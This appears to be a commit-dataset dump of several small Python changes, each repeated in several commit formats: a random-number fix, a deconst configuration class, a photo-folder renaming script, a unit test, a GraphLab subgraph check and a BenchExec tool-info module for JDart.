1yvT0s/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,tjhorner/illacceptanything,caioproiete/illacceptanything,triggerNZ/illacceptanything,illacceptanything/illacceptanything,caioproiete/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,caioproiete/illacceptanything,illacceptanything/illacceptanything,caioproiete/illacceptanything,caioproiete/illacceptanything,JeffreyCA/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,oneminot/illacceptanything,illacceptanything/illacceptanything,tjhorner/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,triggerNZ/illacceptanything,TheWhiteLlama/illacceptanything,1yvT0s/illacceptanything,ds84182/illacceptanything,paladique/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,JeffreyCA/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,TheWhiteLlama/illacceptanything,tjhorner/illacceptanything,paladique/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,paladique/illacceptanything,ultranaut/illacceptanything,oneminot/illacceptanything,paladique/illacceptanything,dushmis/illacceptanything,ds84182/illacceptanything,ds84182/illacceptanything,illacceptanything/illacceptanything,triggerNZ/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,tjhorner/illacceptanything,caioproiete/illacceptanything,ultranaut/illacceptanything,illacceptanything/illacceptanything,dushmis/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,paladique/illacceptanything,tjhorner/illacceptanything,triggerNZ/illacceptanything,dushmis/illacceptanything,triggerNZ/illacceptanything,caioproiete/illacceptanything,paladique/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything,ds84182/illacceptanything,dushmis/illacceptanything,dushmis/illacceptanything,JeffreyCA/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,dushmis/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,tjhorner/illacceptanything,1yvT0s/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,triggerNZ/illacceptanything,triggerNZ/illacceptanything,caioproiete/illacceptanything,ds84182/illacceptanything,1yvT0s/illacceptanything,triggerNZ/illacceptanything,tjhorner/illacceptanything,illacceptanything/illacceptanything,ds84182/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,1yvT0s/illacceptanything,paladique/illacceptanything,TheWhiteLlama/illacceptanything,ds84182/illacceptanything,JeffreyCA/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,dushmis/illacceptanything,TheWhiteLlama/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,tjhorner/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything,oneminot/illacceptanything,ultranaut/illacceptanything,JeffreyCA/illacceptanything,JeffreyCA/illacceptanything,illacceptanything/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,triggerNZ/illacceptanything,ultranaut/illacceptanything,triggerNZ/illacceptanything,paladique/illacceptanything,ds84182/illacceptanything,1yvT0s/illacceptanything,oneminot/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,ultranaut/illacceptanything,paladique/illacceptanything,JeffreyCA/illacceptanything,triggerNZ/illacceptanything,oneminot/illacceptanything,triggerNZ/illacceptanything,1yvT0s/illacceptanything,dushmis/illacceptanything,ds84182/illacceptanything,tjhorner/illacceptanything,paladique/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,caioproiete/illacceptanything,illacceptanything/illacceptanything,ultranaut/illacceptanything,TheWhiteLlama/illacceptanything,ultranaut/illacceptanything,tjhorner/illacceptanything,oneminot/illacceptanything,1yvT0s/illacceptanything,illacceptanything/illacceptanything,JeffreyCA/illacceptanything
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
Fix python random number generator.
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
<commit_before>def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
<commit_msg>Fix python random number generator.<commit_after>
|
from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
Fix python random number generator.from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
<commit_before>def get_random_number(start=1, end=10):
"""https://xkcd.com/221/"""
return 4
<commit_msg>Fix python random number generator.<commit_after>from random import randint
def get_random_number(start=1, end=10):
"""Generates and returns random number between :start: and :end:"""
return randint(start, end)
|
7d918fd407b2f5a6de3e3a47b9c7f0e510efd3aa
|
deconstrst/config.py
|
deconstrst/config.py
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = self.sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
Manage the submission decision from Configuration.
|
Manage the submission decision from Configuration.
|
Python
|
apache-2.0
|
deconst/preparer-sphinx,ktbartholomew/preparer-sphinx,deconst/preparer-sphinx,ktbartholomew/preparer-sphinx
|
Manage the submission decision from Configuration.
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = self.sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
<commit_before><commit_msg>Manage the submission decision from Configuration.<commit_after>
|
# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = self.sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
Manage the submission decision from Configuration.# -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = self.sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
<commit_before><commit_msg>Manage the submission decision from Configuration.<commit_after># -*- coding: utf-8 -*-
import sh
import re
class Configuration:
"""
Configuration settings derived from the environment and current git branch.
"""
def __init__(self, env):
self.content_store_url = env.get("CONTENT_STORE_URL")
self.content_id_base = env.get("CONTENT_ID_BASE")
self.deployment_ref = re.compile(env.get("DEPLOY_REF",
"refs/heads/master"))
try:
self.refname = self.sh.git("symbolic-ref", "HEAD").strip()
except sh.ErrorReturnCode:
self.refname = ""
def skip_submit_reasons(self):
"""
Determine whether or not the current build should result in submission
to the content service. If not, return a list of reasons why it won't.
"""
reasons = []
if not self.content_store_url:
reasons.append("Missing CONTENT_STORE_URL, the base URL of the "
"content storage service.")
if not self.content_id_base:
reasons.append("Missing CONTENT_ID_BASE, the base URL used to "
"generate IDs for content within this repository.")
if not self.deployment_ref.match(self.refname):
reasons.append(
"The current git ref ({}) doesn't match the deployment ref "
"regexp ({}).".format(self.refname,
self.deployment_ref.pattern))
return reasons
@classmethod
def load(cls, env):
"""
Derive the current configuration from the environment.
"""
return cls(env)
|
|
69032c5fbd21b6efe66da2c2da4cfbdfd0e17803
|
scripts/convert_dates.py
|
scripts/convert_dates.py
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
Add script to convert from Sony folder name structure
|
Add script to convert from Sony folder name structure
|
Python
|
mit
|
itko/itko.github.io,itko/itko.github.io,itko/itko.github.io,itko/itko.github.io
|
Add script to convert from Sony folder name structure
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
<commit_before><commit_msg>Add script to convert from Sony folder name structure<commit_after>
|
import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
Add script to convert from Sony folder name structureimport os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
<commit_before><commit_msg>Add script to convert from Sony folder name structure<commit_after>import os
PATH = os.path.expanduser('/media/itto/TOSHIBA EXT/Photos/To sort')
for item in os.listdir(PATH):
itemPath = os.path.join(PATH, item)
if os.path.isfile(itemPath):
pass
else:
day, month, year = item.split('-')
newName = '{}-{}-{}'.format(year, month, day)
newPath = os.path.join(PATH, newName)
os.rename(itemPath, newPath)
|
|
54ea08989016cc5e8c90d98fac6d0a6f341b0a9a
|
test/__init__.py
|
test/__init__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
Add basic unit test support
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python
|
Python
|
bsd-3-clause
|
vcatechnology/pygh
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
<commit_before><commit_msg>Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
<commit_before><commit_msg>Add basic unit test support
This pretty much is only testing that the file imports correctly in
different versions of python<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import inspect
import unittest
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(
os.path.abspath(inspect.getfile(inspect.currentframe()))))))
import pygh
class TestPyGh(unittest.TestCase):
'''
Tests functions that are available in the :mod:`pygh` module.
'''
def test_find_exe_in_path(self):
'''
Tests that the :func:`pygh.find_exe_in_path` returns a list when
searching for the :code:`echo` program, which should exist on all
systems
'''
self.assertTrue(pygh.find_exe_in_path('echo'))
|
|
bf444772b650893b78dec9bacf4dcbcb749d20a5
|
check_subgraph.py
|
check_subgraph.py
|
# This technique works best of the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `sub_g` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
Add how-to for checking if one graph is a subgraph of another.
|
Add how-to for checking if one graph is a subgraph of another.
|
Python
|
cc0-1.0
|
srikris/how-to,dato-code/how-to,nagyistoce/how-to-graphlab-create
|
Add how-to for checking if one graph is a subgraph of another.
|
# This technique works best of the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `sub_g` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
<commit_before><commit_msg>Add how-to for checking if one graph is a subgraph of another.<commit_after>
|
# This technique works best of the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `sub_g` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
Add how-to for checking if one graph is a subgraph of another.# This technique works best of the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `sub_g` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
<commit_before><commit_msg>Add how-to for checking if one graph is a subgraph of another.<commit_after># This technique works best of the proposed subgraph is small. It does not scale
# well if both graphs are large.
import graphlab as gl
def is_subgraph(subgraph, g, vert_id='__id', src_id='__src_id',
dst_id='__dst_id'):
"""
Check if `sub_g` is a subgraph of `g`. `vert_id`, `src_id`, and
`dst_id` are the column names for vertex, source, and destination vertex
IDs.
"""
subgraph_flag = True
## Check if vertices are a subset
sf_filter = g.vertices.filter_by(subgraph.vertices[vert_id], vert_id)
if sf_filter.num_rows() < subgraph.vertices.num_rows():
subgraph_flag = False
## Check if edges are a subset
sf_join = subgraph.edges.join(g.edges, on=[src_id, dst_id], how='inner')
if sf_join.num_rows() < subgraph.edges.num_rows():
subgraph_flag = False
return subgraph_flag
## Use the function on a toy example
g = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g = g.add_edges([gl.Edge(0, 1), gl.Edge(0, 2)])
g2 = gl.SGraph().add_vertices([gl.Vertex(i) for i in range(3)])
g2 = g2.add_edges(gl.Edge(0, 1))
print is_subgraph(g2, g)
# True
g2 = g2.add_edges(gl.Edge(1, 2))
print is_subgraph(g2, g)
# False
|
|
b36e0ce911b35b3f1dccad9f616df72253ed9560
|
benchexec/tools/jdart.py
|
benchexec/tools/jdart.py
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
Add Tool Info for JDart
|
Add Tool Info for JDart
|
Python
|
apache-2.0
|
dbeyer/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,ultimate-pa/benchexec,sosy-lab/benchexec,sosy-lab/benchexec,ultimate-pa/benchexec,sosy-lab/benchexec,dbeyer/benchexec,ultimate-pa/benchexec,dbeyer/benchexec,sosy-lab/benchexec,sosy-lab/benchexec,dbeyer/benchexec,sosy-lab/benchexec
|
Add Tool Info for JDart
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
<commit_before><commit_msg>Add Tool Info for JDart<commit_after>
|
"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
Add Tool Info for JDart"""
BenchExec is a framework for reliable benchmarking.
This file is part of BenchExec.
Copyright (C) 2007-2018 Dirk Beyer
All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import benchexec.util as util
import benchexec.tools.template
import benchexec.result as result
class Tool(benchexec.tools.template.BaseTool):
"""
Tool info for JDart modified by TU Dortmund
(https://github.com/tudo-aqua/jdart).
"""
REQUIRED_PATHS = ["jconstraints-extensions",
"lib",
"z3",
"basic.jpf",
"jdk8u222-b10",
"jconstraints-0.9.2-SNAPSHOT.jar",
"jpf-annotations.jar",
"jpf-classes.jar",
"jpf.jar",
"jpf-jdart-annotations.jar",
"jpf-jdart-classes.jar",
"jpf-jdart.jar",
"RunJPF.jar",
"version.txt"]
def executable(self):
return util.find_executable("run-jdart.sh")
def version(self, executable):
return self._version_from_tool(executable, arg="-v")
def name(self):
return "JDart"
def cmdline(self, executable, options, tasks, propertyfile, rlimits):
cmd = [executable]
if options:
cmd = cmd + options
if propertyfile:
cmd.append(propertyfile)
return cmd + tasks
def determine_result(self, returncode, returnsignal, output, isTimeout):
# parse output
status = result.RESULT_UNKNOWN
for line in output:
if "== ERROR" in line:
status = result.RESULT_FALSE_PROP
elif "== OK" in line:
status = result.RESULT_TRUE_PROP
return status
|
<commit_before><commit_msg>Add Tool Info for JDart<commit_after>"""
BenchExec is a framework for reliable benchmarking.
